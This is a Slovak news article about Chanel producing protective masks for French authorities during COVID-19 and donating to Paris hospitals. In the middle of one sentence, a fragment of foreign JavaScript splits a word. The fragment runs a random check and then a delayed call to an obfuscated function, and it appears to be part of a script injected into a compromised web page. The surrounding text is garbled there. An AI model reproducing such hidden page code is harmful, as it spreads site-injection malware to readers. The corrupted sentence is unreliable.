Do boja proti vírusu sa zapája už aj Chanel

| apríl 4, 2020

Ako jedna z posledných luxusných dizajnérskych značiek sa do boja proti koronavírusu zapája aj francúzsky módny dom Chanel. Počnúc týmto týždňom začína s produkciou ochranných masiek a odevov.

Po tom, ako sa francúzsky minister zdravotníctva Olivier Véran vyjadril, že sa vo Francúzsku týždenne spotrebuje viac ako 40 miliónov ochranných masiek, ktorých je momentálne globálny deficit, sa rozhodol zakročiť aj CEO módneho domu Chanel – Alain Wertheimer, a to výrobou prototypov ochranných masiek. Tieto masky budú bezvýhradne dodávané francúzskym autoritám, a ďalej rozdávané do nemocníc a zariadení, kde je to potrebné najviac.

V súčasnosti sa v dielňach módnej značky pracuje na výrobe prototypov, ktoré čakajú na schválenie pred tým, než sa začnú masovo produkovať. Okrem tohto gesta sa však vedenie značky rozhodlo, že napriek úpadku dopytu v súvislosti s pandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andémiou COVID-19, zatiaľ nebude prepúšťať. Aj takýmto spôsobom sa snaží pomôcť krajine čiastočným finančným odbremenením, aby sa peniaze mohli využiť na nákup zdravotníckych potrieb.

Módny dom tiež finančne podporil fond verejného zdravotníctva. Nemocniciam v Paríži minulý týždeň venoval sumu 1,2 milióna eur.

 

Foto: harpersbazaar.com

 

Tags:

Category: HOMEPAGE, VYCHYTÁVKY

Comments are closed.